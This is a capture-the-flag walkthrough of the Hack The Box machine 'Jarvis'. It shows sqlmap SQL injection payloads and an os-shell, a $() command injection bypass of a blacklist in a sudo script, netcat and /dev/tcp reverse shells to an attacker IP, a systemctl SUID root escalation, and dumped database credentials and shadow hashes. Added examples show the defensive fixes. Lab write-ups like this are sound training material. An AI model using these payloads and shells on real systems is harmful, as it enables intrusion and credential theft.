Learning as I go

Jarvis Hack The Box Walkthrough

Posted at — Feb 17, 2020

Walkthrough of machine Jarvis from Hack the Box. Key findings include a website vulnerable to SQL injection, an internal script vulnerable to command injection, and a binary with unnecessary SUID permissions.

Walkthrough of Jarvis machine from Hack the Box.

Key Findings

Key findings noted from the machine Jarvis:

Scanning & Enumeration

Nmap was used to complete an initial scan of the host (command: nmap -A -T4 10.10.10.143). Amended outputs shown below, key items highlighted. Scan shows reported instances of:

Nmap scan failed to fingerprint the machine. The banner returned by OpenSSH suggests the machine is running Debian Stretch (7.4p1-10+deb9u6 is the OpenSSH version available on Debian Stretch), which points to a reasonably recent operating system.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
<SNIP>
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
<SNIP>
|_http-server-header: Apache/2.4.25 (Debian)
<SNIP>

HTTP

Opening the website shows the page for Stark Hotel. Hostname of supersecurehotel.htb identified from reviewing the page and added to the /etc/hosts file for easier follow-up navigation.

Initial manual walkthrough of page URLs identifies the following items of interest.

Results of web enumeration tool identified a phpMyAdmin page as present.

Analysis of identified pages done using wfuzz to check for hidden parameters and potential LFI vulnerabilities.

General approach used is command: wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 3024 -u http://supersecurehotel.htb/room.php?FUZZ=/etc/passwd. Value supplied via --hh varied based on default return length of the page.

After abandoning LFI as an attack method, SQL injection was tried using the identified cod parameter in the room.php file. Presence of an SQLi vulnerability in the page confirmed (command: sqlmap -u http://supersecurehotel.htb/room.php?cod=1). Amended output from the command shown below.

<SNIP>
GET parameter 'cod' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 2897=2897

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 8589 FROM (SELECT(SLEEP(5)))qxAl)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-8309 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b706b71,0x7a4e4a6f6b677746726d5a45795746717a5456776a74775847444d48596441784e7276724d537273,0x717a766a71),NULL,NULL-- LmIs
---
[08:04:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
<SNIP>
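Why the cod parameter answers sqlmap's boolean and UNION tests, and what closes the hole, shown as an added example that is not code from the machine or from the original post. It assumes room.php builds its query by string concatenation (the page does not show the source), uses SQLite in place of MySQL, and the table and column names are constructed.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the hotel database; column names are invented.
    # Seven columns, matching the column count in sqlmap's UNION test.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE room (cod INTEGER PRIMARY KEY, name TEXT, price INTEGER,"
               " descrip TEXT, star TEXT, image TEXT, mini TEXT)")
    db.execute("INSERT INTO room VALUES (1, 'Family Room', 270, 'd', '5', 'i.jpg', 'm')")
    return db

def room_concat(db, cod):
    # Assumed vulnerable pattern: the request value becomes part of the SQL text.
    return db.execute("SELECT * FROM room WHERE cod=" + cod).fetchall()

def room_bound(db, cod):
    # Hardened: enforce the expected type, then bind the value as a parameter.
    if not re.fullmatch(r"[0-9]{1,9}", cod):
        raise ValueError("cod must be a plain integer")
    return db.execute("SELECT * FROM room WHERE cod=?", (int(cod),)).fetchall()

# Inputs: the boolean payload from the sqlmap output, its false twin
# (constructed), and the UNION payload with the CONCAT() marker simplified.
INPUTS = ["1", "1 AND 2897=2897", "1 AND 2897=2898",
          "-8309 UNION ALL SELECT NULL,NULL,NULL,NULL,'marker',NULL,NULL-- LmIs"]

def compare(db):
    """Row count per input for the concatenated query, and for the bound
    query ('rejected' when validation refuses the value)."""
    out = {}
    for value in INPUTS:
        try:
            bound = len(room_bound(db, value))
        except ValueError:
            bound = "rejected"
        out[value] = (len(room_concat(db, value)), bound)
    return out

if __name__ == "__main__":
    for value, result in compare(make_db()).items():
        print(result, value)
```

The concatenated query returns a different row count for the true and false conditions, which is the signal a boolean-based blind test relies on; the bound query never lets the value reach the SQL parser.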

Remote shell then obtained using the --os-shell parameter of sqlmap (command: sqlmap -u http://supersecurehotel.htb/room.php?cod=1 --os-shell). Improved shell gained by using the sqlmap os-shell to spawn a reverse shell via nc.

Gaining Access & Privilege Escalation

Initial access gained via sqlmap os-shell. Initial user determined to be www-data (generic user for running web server). Basic Linux enumeration steps completed. Server confirmed as running Linux version 4.9.0-8-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.144-3.1 (2019-02-19), which lines up with earlier observations. User.txt file stored in home directory of user pepper and not directly readable.

Review of sudo privileges (command: sudo -l) identified way forward. User www-data can run command simpler.py as user pepper without supplying a password.

Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

Review of the script identified a command injection vulnerability in the function exec_ping(). The value of command is only checked against a blacklist of characters, so input that avoids the blacklisted characters is passed unchanged to os.system and runs as user pepper.

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

Script triggered (command: sudo -u pepper /var/www/Admin-Utilities/simpler.py -p). A command can then be injected using the $() syntax, which is not on the blacklist. The shell started by os.system evaluates whatever is inside the $() and substitutes its output into the ping command line.

Enter an IP: $(cat /home/pepper/user.txt)
$(cat /home/pepper/user.txt)
ping: 2afa36c4f05b37b34259c93551f5c44f: Temporary failure in name resolution

User.txt value of 2afa36c4f05b37b34259c93551f5c44f confirmed.

Shell for user pepper then obtained using the above method to spawn a new reverse netcat shell. Value of $(/tmp/bob) passed to the script as input, where /tmp/bob contains the below. This bypasses the blacklist because the contents of /tmp/bob are never checked; the file is only executed when the os.system call runs.

#!/bin/bash
nc -nv 10.10.13.218 5552 -e /bin/sh
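The blacklist from exec_ping() beside an allowlist version, as an added example that is not part of simpler.py or of the original post. The function names build_ping_argv, exec_ping_safe and compare are hypothetical; the sample inputs are the ones shown on the page.

```python
import ipaddress
import subprocess

# Blacklist copied from exec_ping() on the page.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']

def blacklist_allows(value):
    """The original check: True when no forbidden token appears in the input."""
    return not any(token in value for token in FORBIDDEN)

def build_ping_argv(value):
    """Allowlist check: accept only a literal IPv4/IPv6 address and return an
    argument vector, so no shell ever parses the input."""
    try:
        addr = ipaddress.ip_address(value.strip())
    except ValueError:
        raise ValueError("not an IP address: %r" % value) from None
    return ["ping", "-c", "1", str(addr)]

def exec_ping_safe(value):
    # A list argv with the default shell=False passes the address to ping as
    # one argument; "$(...)" would be a literal string, not a substitution.
    return subprocess.run(build_ping_argv(value), timeout=10).returncode

# The two "$()" inputs are the ones shown on the page.
SAMPLES = ["10.10.10.143", "$(cat /home/pepper/user.txt)", "$(/tmp/bob)"]

def compare(samples=SAMPLES):
    """For each input: (value, passes the blacklist, passes the allowlist)."""
    rows = []
    for value in samples:
        try:
            build_ping_argv(value)
            accepted = True
        except ValueError:
            accepted = False
        rows.append((value, blacklist_allows(value), accepted))
    return rows

if __name__ == "__main__":
    for row in compare():
        print(row)
```

Both $() inputs pass the blacklist and fail the allowlist; validating against what an IP address is, rather than against characters believed dangerous, removes the need to enumerate shell syntax at all.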

Further enumeration as user pepper identified a vulnerability in a configured SUID binary (command: find / -perm -u=s -type f 2>/dev/null)

/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su

A review of https://gtfobins.github.io/gtfobins/systemctl/ explained how this could be exploited.

#1 – bob.service
[Unit]
Description=root shell

[Service]
User=root
ExecStart=/bin/bash '/home/pepper/bobshell.sh'

[Install]
WantedBy=multi-user.target

# 2 – bobshell.sh

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.13.218/5500 0>&1

With login obtained root.txt value of d41d8cd98f00b204e9800998ecf84271 then confirmed.
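The SUID finding above from the defender's side: an added example, not from the original post, that lists setuid files and flags those outside an expected baseline. The baseline set is an assumption limited to the names in the page's listing; on a real host it would come from the distribution's package manifest.

```python
import os
import stat

# Assumption: setuid basenames expected on this host. Of the five results
# listed on the page, systemctl is the one outside this baseline.
BASELINE = {"mount", "umount", "ping", "su"}

def find_suid(root):
    """Yield (path, mode, owner_uid) for regular files under root that carry
    the setuid bit, like `find <root> -perm -u=s -type f`."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished, as with 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, stat.filemode(st.st_mode), st.st_uid

def unexpected_suid(root, baseline=BASELINE):
    """Setuid files whose basename is not in the baseline, sorted by path."""
    return sorted(hit for hit in find_suid(root)
                  if os.path.basename(hit[0]) not in baseline)

if __name__ == "__main__":
    for path, mode, uid in unexpected_suid("/bin"):
        print(mode, uid, path)
```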

Post Exploitation

Mysql credentials

Review of the config.php file in the web directory confirmed the database credentials.

<?php
$connection=new mysqli('127.0.0.1','DBadmin','imissyou','hotel');
?>

These credentials work when logging into the identified phpMyAdmin instance. Manual review of the database contents reveals nothing of interest.

System Password hashes

With root access the following system password hashes were then extracted. Attempts at cracking these have proved unsuccessful.

root:$6$4b8khrb3$HYMrEymM/Gv0LcVdrC0L9dPal6oV4uXbQTdbSVOlWsDSlSP7QuDGp10izcfIMc16ZPr0UGZGGoWTgzPuGwg0K1:17960:0:99999:7:::
pepper:$6$ppVlcz04$Nx619njlzUuUPZaUnKBWCiPNVngd0Zw7lgxywgZFzuCl7i9G9Ltl0TLPucaThquZhpQzoSOVglkUrbdTfjDqI1:17960:0:99999:7:::

Alternative File Upload Tool

Review of the web upload directory identified the file getfileayax.php. It's surmised this could be used as an alternative exploit method. Attempts at trying to upload a file via it using curl were unsuccessful.

<?php
error_reporting(0);
if($_POST['getfile']){
if(file_get_contents($_POST['getfile'])){
echo '<h4 style="color:black;">'.htmlspecialchars(file_get_contents($_POST['getfile'])).'</h4>';
}
else{
echo '<h2 style="color:red">Nothing to show</h2>';
}
}
else{
header("Location:/index.php");}
?>